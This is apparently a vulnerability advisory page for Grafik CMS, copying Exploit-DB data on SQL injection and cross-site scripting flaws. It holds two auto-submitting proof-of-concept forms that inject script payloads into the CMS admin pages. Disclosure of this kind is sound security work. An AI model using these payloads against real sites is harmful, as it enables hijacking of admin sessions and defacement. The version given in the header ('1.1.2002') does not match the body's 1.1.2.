Grafik CMS SQL Injection and Cross-Site Scripting Vulnerabilities

vendor:

Grafik CMS

by:

N/A

CVSS

HIGH

SQL Injection and Cross-Site Scripting

CWE

Product Name: Grafik CMS

Affected Version From: 1.1.2002

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Grafik CMS SQL Injection and Cross-Site Scripting Vulnerabilities

The Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities due to inadequate sanitization of user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user-supplied input before using it in SQL queries or outputting it to HTML. Additionally, it is advised to keep the CMS software up to date with the latest patches and versions.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41227/info

Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Grafik CMS 1.1.2 is vulnerable; other versions may be affected. 

<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
	<input type="hidden" name="page_title" value="page title" />
	<input type="hidden" name="page_menu" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
	<input type="hidden" name="id" value="1" />
	<input type="hidden" name="page_content" value="some page content" />
	<input id="sbmt" type="submit" name="submit" value="Modifier" />
</form>
<script>
document.getElementById(&#039;sbmt&#039;).click();
</script>


<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
	<input type="hidden" name="name" value="site title" />
	<input type="hidden" name="admin_mail" value="example@example.com" />
	<input type="hidden" name="keywords" value="" />
	<input type="hidden" name="description" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
	<input type="hidden" name="site_url" value="http://www.example.com/" />
	<input type="hidden" name="seo_url" value="0" />
	<input type="hidden" name="mailing" value="1" />
	<input type="hidden" name="template" value="templates/default" />
	<input id="sbmt" type="submit" name="submit" value="Valider" />
</form>
<script>
document.getElementById(&#039;sbmt&#039;).click();
</script>